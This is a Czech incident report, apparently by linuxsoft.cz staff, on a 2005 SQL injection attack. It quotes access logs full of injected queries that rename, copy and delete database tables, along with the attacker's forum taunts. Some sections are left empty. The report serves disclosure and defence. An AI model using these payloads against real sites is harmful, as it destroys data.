212.158.128.159 - - [05/Dec/2005:14:34:32 +0100] "GET /sw_list.php?id_kategory=6 HTTP/1.0" 200 66184 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:36:14 +0100] "GET /script_list.php?id_kategory=156 HTTP/1.0" 200 56191 "http://www.linuxsoft.cz/sw_list.php?id_kategory=6" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:46:48 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20kategorie_sw%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:47:07 +0100] "GET /script_list.php?id_kategory=(SELECT%20name%20FROM%20kategorie_sw%20LIMIT%201) HTTP/1.0" 200 54800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:47:23 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20articles%20LIMIT%201) HTTP/1.0" 200 54818 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:48:07 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:27 +0100] "GET / HTTP/1.0" 200 71779 "http://www.linuxsoft.cz/script_list.php?id_kategory=(SELECT%20title%20FROM%20article%20LIMIT%201)" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:28 +0100] "GET /img/banner_468-60-2.gif HTTP/1.0" 200 44573 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:37 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:48 +0100] "GET /script_list.php?id_kategory=(SELECT%20popiska_cz%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54556 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:56:21 +0100] "GET /script_list.php?id_kategory=(SELECT%20popis_cz%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54814 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:56:38 +0100] "GET /script_list.php?id_kategory=(SELECT%20popiska_cz%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54556 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:59:23 +0100] "GET / HTTP/1.0" 200 71678 "http://www.linuxsoft.cz/script_list.php?id_kategory=(SELECT%20popiska_cz%20FROM%20article%20LIMIT%201)" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"

O něco později se útočník pravděpodobně pokusil zakrýt svou identitu, když komunikaci s naším serverem přesměrovával přes jakousi anonymní proxy ve Vientnamu.

203.162.27.200 - - [05/Dec/2005:14:25:58 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57422 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:31:06 +0100] "GET /script_list.php?id_kategory=157));%20RENAME%20TABLE%20kategorie_sw%20TO%20kategorie_sw_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54974 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:33:06 +0100] "GET /script_list.php?id_kategory=157));%20RENAME%20TABLE%20users%20TO%20users_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54946 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:33:50 +0100] "GET /script_list.php?id_kategory=157));%20RENAME%20TABLE%20article%20TO%20article_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54954 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:35:56 +0100] "GET /script_list.php?id_kategory=157));%20ALTER%20TABLE%20kategorie_sw%20RENAME%20TO%20kategorie_sw_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54966 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:39:59 +0100] "GET /script_list.php?id_kategory=157));%20ALTER%20TABLE%20kategorie_sw%20DROP%20COLUMN%20id;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54914 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:43:36 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20kategorie_sw%20SET%20id%20=%20NULL;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55172 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:45:26 +0100] "GET /script_list.php?id_kategory=157));%20ALTER%20TABLE%20kategorie_sw%20DROP%20CONSTRAINT%20category_parent;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54948 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:49:17 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20kategorie_sw_sql_inj_lool%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55354 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:51:07 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw_sql_inj_lool;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57435 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:52:46 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20article_sql_inj_lool%20FROM%20article;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55324 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:53:11 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20users_sql_inj_lool%20FROM%20users;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55312 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:59:30 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20articles%20SET%20popiska_cz=Kdo HTTP/1.0" 200 54868 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:00:42 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20articles%20SET%20popiska_cz=%22Kdo%20neumi%20programovat%20at%20neprogramuje... %20Doporucuji%20precist%20neco%20o%20SQL%20Injection%22;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55078 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:02:44 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20articles%20SET%20popiska_cz=%22Kdo%20neumi%20programovat%20at%20neprogramuje... %20Doporucuji%20precist%20neco%20o%20SQL%20Injection%22;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55078 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:04:22 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20articles;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54868 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:05:13 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20article;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57415 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:06:06 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20users;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55120 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:06:51 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55138 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:08:31 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20polozka_sw_sql_inj_lool%20FROM%20polozka_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55342 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:09:43 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20polozka_sw_sql_inj_lool;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57433 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:11:10 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20polozka_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57418 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:12:17 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54353 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:14:01 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20wallpapers_sql_inj_lool%20FROM%20wallpapers;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54557 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:15:00 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20wallpapers;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 56633 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:16:40 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54359 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:18:03 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20distribuce_sql_inj_lool%20FROM%20distribuce;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54557 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:19:00 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20distribuce;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54399 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:19:30 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54359 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:21:45 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20relace_distro_balicek_sql_inj_lool%20FROM%20relace_distro_balicek;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54623 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:22:41 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20relace_distro_balicek;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 56644 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:23:53 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20distribuce;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 56633 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:24:48 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 53554 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:27:14 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20skripty_distro_balicek_sql_inj_lool%20FROM%20skripty;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 53784 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:28:06 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20skripty;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 52988 "-" "Wget/1.10.2 (Red Hat modified)"

Pak si útočník zakládá uživatelský účet, aby mohl poslat do diskuze[2] komentář:

Datum: 5.12.2005 15:46 Předmět: SQL injection Od: Newim Jeden moudry clovek rikal "Nedelej co neumis". Programatori tohoto portalu by si toto meli vzit k srdci... Pro volne chvilky doporucuji aby si programatori nechali vysvetlit vyraz SQL Injection. Btw: Byt vami, nemazu databazi a podivam se na seznam tabulek.

Patřičné logy:

203.162.27.200 - - [05/Dec/2005:15:29:45 +0100] "GET / HTTP/1.1" 200 56663 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:29:48 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:29:49 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:30:14 +0100] "GET / HTTP/1.1" 200 509 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:14 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:15 +0100] "GET / HTTP/1.1" 200 56656 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:17 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:35 +0100] "GET /prispevek_edit.php?type_item=8 HTTP/1.1" 200 52726 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:07 +0100] "GET / HTTP/1.1" 200 56530 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:09 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:10 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:19 +0100] "GET /prispevek_edit.php?type_item=8 HTTP/1.1" 200 52726 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:33:26 +0100] "GET /user_edit.php?reg_tlacitko=1 HTTP/1.1" 200 45168 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:35:45 +0100] "POST /user_save.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/user_edit.php?reg_tlacitko=1" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:35:49 +0100] "GET /user_edit.php?error_array[0]=120&user_id=&uzivatelske_jmeno=sds&passwd_orig=sdssds&name_user=Newim&birth_year=&pref_distro=&about_user=&home_page=&email=newim@linux.org HTTP/1.1" 200 45382 "http://www.linuxsoft.cz/user_save.php" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:36:16 +0100] "POST /user_save.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/user_edit.php?error_array[0]=120&user_id=&uzivatelske_jmeno=sds&passwd_orig=sdssds&name_user=Newim&birth_year=&pref_distro=&about_user=&home_page=&email=newim@linux.org" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:36:19 +0100] "GET /user_edit.php?user_id=6812&error_array[0]=1 HTTP/1.1" 200 44812 "http://www.linuxsoft.cz/user_save.php" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:36:52 +0100] "GET /img/sipka2.png HTTP/1.1" 200 160 "http://www.linuxsoft.cz/user_edit.php?user_id=6812&error_array[0]=1" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:37:19 +0100] "GET /sw_list.php?id_kategory=80 HTTP/1.1" 200 52387 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:37:45 +0100] "POST /login.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/prispevek_edit.php?type_item=8" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:38:18 +0100] "GET / HTTP/1.1" 200 56538 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:19 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:21 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:39 +0100] "POST /login.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:50 +0100] "GET /prispevek_edit.php?type_item=8 HTTP/1.1" 200 54277 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:43:08 +0100] "POST /prispevek_nahled.php HTTP/1.1" 200 54580 "http://www.linuxsoft.cz/prispevek_edit.php?type_item=8" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:43:55 +0100] "POST /prispevek_edit.php HTTP/1.1" 200 54548 "http://www.linuxsoft.cz/prispevek_nahled.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:46:07 +0100] "POST /prispevek_nahled.php HTTP/1.1" 200 54583 "http://www.linuxsoft.cz/prispevek_edit.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:46:39 +0100] "POST /prispevek_save.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/prispevek_nahled.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:46:48 +0100] "GET /poradte_soft_list.php?id_prispevku=5167&error_array[1]=1 HTTP/1.1" 200 67809 "http://www.linuxsoft.cz/prispevek_save.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:47:11 +0100] "GET /diskuze.php?id_vazba=5167&type_item=8 HTTP/1.1" 200 55965 "http://www.linuxsoft.cz/poradte_soft_list.php?id_prispevku=5167&error_array[1]=1" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:47:43 +0100] "GET /user_page.php?user_id=6812 HTTP/1.1" 200 54764 "http://www.linuxsoft.cz/diskuze.php?id_vazba=5167&type_item=8" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [06/Dec/2005:14:52:37 +0100] "GET /diskuze.php?id_vazba=5167&type_item=8 HTTP/1.1" 200 73572 "-" "Links (2.1pre7; Linux 2.4.20-petr i686; 156x54)"
203.162.27.200 - - [06/Dec/2005:14:55:15 +0100] "GET /diskuze.php?id_vazba=5167&type_item=8 HTTP/1.1" 200 73572 "-" "Links (2.1pre7; Linux 2.4.20-petr i686; 156x54)"
203.162.27.200 - - [06/Dec/2005:15:06:32 +0100] "POST /prispevek_nahled.php HTTP/1.1" 200 55579 "-" "Links (2.1pre7; Linux 2.4.20-petr i686; 156x54)"
203.162.27.200 - - [07/Dec/2005:14:33:49 +0100] "GET /img/flag-cz.png HTTP/1.1" 200 467 "http://www.linuxsoft.cz/shop/?produkt=3854" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Mimochodem, druhý den se útočník opět připojený přes anonymní proxy ozval znovu, jakoby chtěl zdůraznit, že databázi nesmazal, pouze přesunul:

Datum: 6.12.2005 15:07 Předmět: Re: Zálohování Od: Newim Mno, kdyby jste se PORADNE podivali tak data ze vsech smazanych tabulek byly zkopirovany.

Způsobené škody

Závěr

Na tvorbě dokumentu se podíleli:

Dodatky

(*) SQL injection

Cílem těchto útoků je část webové aplikace obsahujícící data – databáze tak, že útočník dostane atakovanou aplikaci do takového stavu, kdy přijímá jeho vstup jako dotazy SQL.

V našem případě šlo o ...

Více najdete například na [3].

(**) anonymní proxy server

Server zprostředkovávající například komunikaci protokolem HTTP. Návštěvník nekomunikuje přímo s cílovým serverem, ale necháva komunikaci na proxy serveru, který mu posílá výsledky, takže z pohledu serveru se jako návštěvník jeví proxy server, který tak skutečnému návštěvníkovi zajišťuje částečnou anonymitu. Pokud je navíc tento server umístěný v zemi, kde není vydání logů pravděpodobné, nebo pokud se logy nevytváří nebo rovnou mazají, je jeho anonymita téměř dokonalá.

Více najdete například na [4].

Odkazy

[1] http://www.linuxsoft.cz [2] http://www.linuxsoft.cz/diskuze.php?id_vazba=5167&type_item=8 [3] http://en.wikipedia.org/wiki/Sql_injection [4] http://en.wikipedia.org/wiki/Proxy_server